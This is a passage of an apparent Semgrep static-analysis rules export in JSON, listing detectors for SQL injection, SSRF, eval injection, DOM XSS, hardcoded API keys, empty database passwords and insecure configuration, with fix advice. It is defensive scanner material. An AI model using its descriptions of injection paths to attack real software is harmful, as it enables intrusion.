unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","id":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","name":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SendGrid API Key detected"},"help":{"markdown":"SendGrid API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SendGrid API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","id":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","name":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"help":{"markdown":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded](https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded)\n","text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","id":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","name":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","properties":{"precision":"very-high","tags":["CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"help":{"markdown":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect","id":"generic.nginx.security.insecure-redirect.insecure-redirect","name":"generic.nginx.security.insecure-redirect.insecure-redirect","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-redirect.insecure-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","id":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","name":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","id":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","name":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"help":{"markdown":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings)\n - [https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies](https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL)\n","text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","id":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","name":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"help":{"markdown":"RSA keys should be at least 2048 bits based on NIST recommendation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","id":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","name":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"help":{"markdown":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root)\n - [https://github.com/hadolint/hadolint/wiki/DL3002](https://github.com/hadolint/hadolint/wiki/DL3002)\n","text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"helpUri":"https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root","id":"dockerfile.security.last-user-is-root.last-user-is-root","name":"dockerfile.security.last-user-is-root.last-user-is-root","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.last-user-is-root.last-user-is-root"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"help":{"markdown":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df](https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df)\n","text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics","id":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","name":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","properties":{"precision":"very-high","tags":["CWE-305: Authentication Bypass by Primary Weakness","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.local-biometrics.insecure-biometrics"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"help":{"markdown":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls)\n - [https://docs.microsoft.com/en-us/azure/key-vault/general/network-security](https://docs.microsoft.com/en-us/azure/key-vault/general/network-security)\n","text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","id":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","name":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec)\n - [https://guides.rubyonrails.org/security.html#command-line-injection](https://guides.rubyonrails.org/security.html#command-line-injection)\n","text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec","id":"ruby.lang.security.dangerous-exec.dangerous-exec","name":"ruby.lang.security.dangerous-exec.dangerous-exec","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-exec.dangerous-exec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cannot determine what '$UNK' is and it is used with a ' which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"help":{"markdown":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss)\n - [https://owasp.org/www-community/attacks/DOM_Based_XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)\n","text":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"helpUri":"https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss","id":"javascript.browser.security.dom-based-xss.dom-based-xss","name":"javascript.browser.security.dom-based-xss.dom-based-xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.dom-based-xss.dom-based-xss"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint","id":"rust.rocket.sql.sqlx-taint.sqlx-taint","name":"rust.rocket.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"help":{"markdown":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request)\n - [https://cwe.mitre.org/data/definitions/95.html](https://cwe.mitre.org/data/definitions/95.html)\n","text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","id":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","name":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"help":{"markdown":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","id":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","name":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-file-permissions.insecure-file-permissions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","id":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","name":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express","id":"javascript.express.db.sqlite-express.sqlite-express","name":"javascript.express.db.sqlite-express.sqlite-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sqlite-express.sqlite-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"help":{"markdown":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls)\n - [https://golang.org/pkg/net/http/#ListenAndServeTLS](https://golang.org/pkg/net/http/#ListenAndServeTLS)\n","text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls","id":"go.lang.security.audit.net.use-tls.use-tls","name":"go.lang.security.audit.net.use-tls.use-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM 